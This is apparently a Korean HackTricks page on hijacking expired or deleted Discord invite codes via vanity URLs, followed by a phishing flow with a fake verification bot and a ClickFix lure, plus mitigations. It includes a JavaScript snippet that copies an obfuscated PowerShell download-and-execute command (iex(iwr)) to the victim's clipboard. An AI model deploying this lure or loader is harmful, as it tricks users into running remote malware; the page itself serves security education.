Discord μ΄ˆλŒ€ μ½”λ“œ νƒˆμ·¨

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°

Discord의 μ΄ˆλŒ€ μ‹œμŠ€ν…œ 취약점은 μœ„ν˜‘ ν–‰μœ„μžκ°€ λ§Œλ£Œλ˜κ±°λ‚˜ μ‚­μ œλœ μ΄ˆλŒ€ μ½”λ“œλ₯Ό μƒˆλ‘œμš΄ 맞좀 링크둜 μ£Όμž₯ν•  수 있게 ν•©λ‹ˆλ‹€(μž„μ‹œ, 영ꡬ λ˜λŠ” μ‚¬μš©μž μ •μ˜). λͺ¨λ“  μ½”λ“œλ₯Ό μ†Œλ¬Έμžλ‘œ μ •κ·œν™”ν•¨μœΌλ‘œμ¨, κ³΅κ²©μžλŠ” μ•Œλ €μ§„ μ΄ˆλŒ€ μ½”λ“œλ₯Ό 사전 λ“±λ‘ν•˜κ³  μ›λž˜ 링크가 λ§Œλ£Œλ˜κ±°λ‚˜ μ†ŒμŠ€ μ„œλ²„μ˜ λΆ€μŠ€νŠΈκ°€ 사라지면 쑰용히 νŠΈλž˜ν”½μ„ νƒˆμ·¨ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

μ΄ˆλŒ€ μœ ν˜• 및 νƒˆμ·¨ μœ„ν—˜

μ΄ˆλŒ€ μœ ν˜•νƒˆμ·¨ κ°€λŠ₯?쑰건 / λΉ„κ³ 
μž„μ‹œ μ΄ˆλŒ€ λ§ν¬βœ…λ§Œλ£Œ ν›„, μ½”λ“œλŠ” μ‚¬μš© κ°€λŠ₯ν•΄μ§€λ©° λΆ€μŠ€νŠΈ μ„œλ²„μ— μ˜ν•΄ 맞좀 URL둜 μž¬λ“±λ‘λ  수 μžˆμŠ΅λ‹ˆλ‹€.
영ꡬ μ΄ˆλŒ€ λ§ν¬βš οΈμ‚­μ œλ˜κ³  μ†Œλ¬Έμžμ™€ 숫자둜만 κ΅¬μ„±λœ 경우, μ½”λ“œλŠ” λ‹€μ‹œ μ‚¬μš© κ°€λŠ₯ν•΄μ§ˆ 수 μžˆμŠ΅λ‹ˆλ‹€.
μ‚¬μš©μž μ •μ˜ 맞좀 λ§ν¬βœ…μ›λž˜ μ„œλ²„κ°€ Level 3 Boostλ₯Ό μžƒμœΌλ©΄, ν•΄λ‹Ή 맞좀 μ΄ˆλŒ€λŠ” μƒˆλ‘œμš΄ 등둝을 μœ„ν•΄ μ‚¬μš© κ°€λŠ₯ν•΄μ§‘λ‹ˆλ‹€.

μ•…μš© 단계

  1. μ •μ°°
  • discord.gg/{code} λ˜λŠ” discord.com/invite/{code} νŒ¨ν„΄κ³Ό μΌμΉ˜ν•˜λŠ” μ΄ˆλŒ€ 링크λ₯Ό μœ„ν•΄ 곡개 μ†ŒμŠ€(포럼, μ†Œμ…œ λ―Έλ””μ–΄, ν…”λ ˆκ·Έλž¨ 채널)λ₯Ό λͺ¨λ‹ˆν„°λ§ν•©λ‹ˆλ‹€.
  • 관심 μžˆλŠ” μ΄ˆλŒ€ μ½”λ“œλ₯Ό μˆ˜μ§‘ν•©λ‹ˆλ‹€(μž„μ‹œ λ˜λŠ” 맞좀).
  1. 사전 등둝
  • Level 3 Boost κΆŒν•œμ΄ μžˆλŠ” Discord μ„œλ²„λ₯Ό μƒμ„±ν•˜κ±°λ‚˜ κΈ°μ‘΄ μ„œλ²„λ₯Ό μ‚¬μš©ν•©λ‹ˆλ‹€.
  • μ„œλ²„ μ„€μ • β†’ 맞좀 URLμ—μ„œ λŒ€μƒ μ΄ˆλŒ€ μ½”λ“œλ₯Ό ν• λ‹Ήν•˜λ €κ³  μ‹œλ„ν•©λ‹ˆλ‹€. 수락되면, μ½”λ“œλŠ” μ•…μ˜μ μΈ μ„œλ²„μ— μ˜ν•΄ μ˜ˆμ•½λ©λ‹ˆλ‹€.
  1. νƒˆμ·¨ ν™œμ„±ν™”
  • μž„μ‹œ μ΄ˆλŒ€μ˜ 경우, μ›λž˜ μ΄ˆλŒ€κ°€ 만료될 λ•ŒκΉŒμ§€ κΈ°λ‹€λ¦½λ‹ˆλ‹€(λ˜λŠ” μ†ŒμŠ€λ₯Ό μ œμ–΄ν•˜λŠ” 경우 μˆ˜λ™μœΌλ‘œ μ‚­μ œν•©λ‹ˆλ‹€).
  • λŒ€λ¬Έμžκ°€ ν¬ν•¨λœ μ½”λ“œμ˜ 경우, μ†Œλ¬Έμž λ³€ν˜•μ€ μ¦‰μ‹œ μ£Όμž₯ν•  수 μžˆμ§€λ§Œ, λ¦¬λ””λ ‰μ…˜μ€ 만료 ν›„μ—λ§Œ ν™œμ„±ν™”λ©λ‹ˆλ‹€.
  1. μ‘°μš©ν•œ λ¦¬λ””λ ‰μ…˜
  • μ‚¬μš©μžκ°€ 이전 링크λ₯Ό λ°©λ¬Έν•˜λ©΄ νƒˆμ·¨κ°€ ν™œμ„±ν™”λœ ν›„ κ³΅κ²©μžκ°€ μ œμ–΄ν•˜λŠ” μ„œλ²„λ‘œ μ›ν™œν•˜κ²Œ μ „μ†‘λ©λ‹ˆλ‹€.

Discord μ„œλ²„λ₯Ό ν†΅ν•œ ν”Όμ‹± 흐름

  1. μ„œλ²„ 채널을 μ œν•œν•˜μ—¬ #verify μ±„λ„λ§Œ 보이도둝 ν•©λ‹ˆλ‹€.
  2. μ‹ κ·œ μ‚¬μš©μžκ°€ OAuth2λ₯Ό 톡해 μΈμ¦ν•˜λ„λ‘ μœ λ„ν•˜λŠ” 봇(예: Safeguard#0786)을 λ°°ν¬ν•©λ‹ˆλ‹€.
  3. 봇이 μ‚¬μš©μžλ₯Ό ν”Όμ‹± μ‚¬μ΄νŠΈ(예: captchaguard.me)둜 λ¦¬λ””λ ‰μ…˜ν•©λ‹ˆλ‹€. μ΄λŠ” CAPTCHA λ˜λŠ” 인증 λ‹¨κ³„μ˜ κ°€μž₯을 μ”λ‹ˆλ‹€.
  4. ClickFix UX νŠΈλ¦­μ„ κ΅¬ν˜„ν•©λ‹ˆλ‹€:
  • κΉ¨μ§„ CAPTCHA λ©”μ‹œμ§€λ₯Ό ν‘œμ‹œν•©λ‹ˆλ‹€.
  • μ‚¬μš©μžκ°€ Win+R λŒ€ν™” μƒμžλ₯Ό μ—΄κ³  미리 λ‘œλ“œλœ PowerShell λͺ…령을 λΆ™μ—¬λ„£κ³  Enterλ₯Ό λˆ„λ₯΄λ„둝 μ•ˆλ‚΄ν•©λ‹ˆλ‹€.

ClickFix ν΄λ¦½λ³΄λ“œ μ£Όμž… μ˜ˆμ‹œ

// Copy malicious PowerShell command to clipboard
const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
`$u=($r[-1..-($r.Length)]-join '');` +
`$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
`iex (iwr -Uri $url)"`;
navigator.clipboard.writeText(cmd);

이 μ ‘κ·Ό 방식은 직접 파일 λ‹€μš΄λ‘œλ“œλ₯Ό ν”Όν•˜κ³  μ‚¬μš©μž μ˜μ‹¬μ„ 쀄이기 μœ„ν•΄ μΉœμˆ™ν•œ UI μš”μ†Œλ₯Ό ν™œμš©ν•©λ‹ˆλ‹€.

μ™„ν™” 쑰치

  • μ΅œμ†Œν•œ ν•˜λ‚˜μ˜ λŒ€λ¬Έμž λ˜λŠ” λΉ„μ•ŒνŒŒλ²³ λ¬Έμžκ°€ ν¬ν•¨λœ 영ꡬ μ΄ˆλŒ€ 링크λ₯Ό μ‚¬μš©ν•˜μ„Έμš” (λ§Œλ£Œλ˜μ§€ μ•ŠμœΌλ©° μž¬μ‚¬μš©ν•  수 μ—†μŒ).
  • μ •κΈ°μ μœΌλ‘œ μ΄ˆλŒ€ μ½”λ“œλ₯Ό λ³€κ²½ν•˜κ³  였래된 링크λ₯Ό μ·¨μ†Œν•˜μ„Έμš”.
  • Discord μ„œλ²„ λΆ€μŠ€νŠΈ μƒνƒœ 및 맞좀 URL 청ꡬλ₯Ό λͺ¨λ‹ˆν„°λ§ν•˜μ„Έμš”.
  • μ‚¬μš©μžμ—κ²Œ μ„œλ²„μ˜ μ§„μœ„λ₯Ό ν™•μΈν•˜κ³  ν΄λ¦½λ³΄λ“œμ— 뢙여넣은 λͺ…령을 μ‹€ν–‰ν•˜μ§€ μ•Šλ„λ‘ κ΅μœ‘ν•˜μ„Έμš”.

μ°Έκ³  λ¬Έν—Œ

Tip

AWS ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°:HackTricks Training AWS Red Team Expert (ARTE)
GCP ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training GCP Red Team Expert (GRTE) Azure ν•΄ν‚Ή 배우기 및 μ—°μŠ΅ν•˜κΈ°: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks μ§€μ›ν•˜κΈ°